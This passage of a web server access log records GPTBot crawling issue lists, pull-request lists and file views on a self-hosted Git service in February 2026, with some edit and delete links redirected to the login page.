[Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:06:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 16675] [Gzip 4.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:19:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=rendered" [Client 74.7.227.38] [Length 14079] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:19:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13255] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" +[17/Feb/2026:19:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11367] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10252] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10087] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10263] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10260] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 2071] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13110] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13272] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:06:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:06:33 +0000] - 200 200 - GET https 